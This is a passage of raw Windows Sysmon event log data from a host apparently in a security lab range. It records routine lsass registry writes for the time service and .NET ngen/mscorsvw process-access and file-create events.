13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD 
(0x00000000-0x000de213) 13241300x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0x4ab3abe5) 13241300x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda0-0xac7813e5) 13241300x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0x0e3c7be5) 13241300x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000de213) 13241300x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0x4ab3abe5) 13241300x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda0-0xac7813e5) 10341000x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.199{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0x0e3c7be5) 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.184{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.184{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:00.106{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b4-0\System.Transactions.dll2021-01-18 13:49:00.106 
10341000x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.934{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.918{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:01.918{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:01.856{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.840{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:01.840{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:01.746{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a2c-0\System.Web.Services.dll2021-01-18 13:49:01.746 10341000x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.684{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.668{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.668{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.512{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.496{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.496{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:02.434{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c50-0\System.Configuration.Install.dll2021-01-18 13:49:02.434 10341000x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.262{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.262{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.090{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.074{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:02.074{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v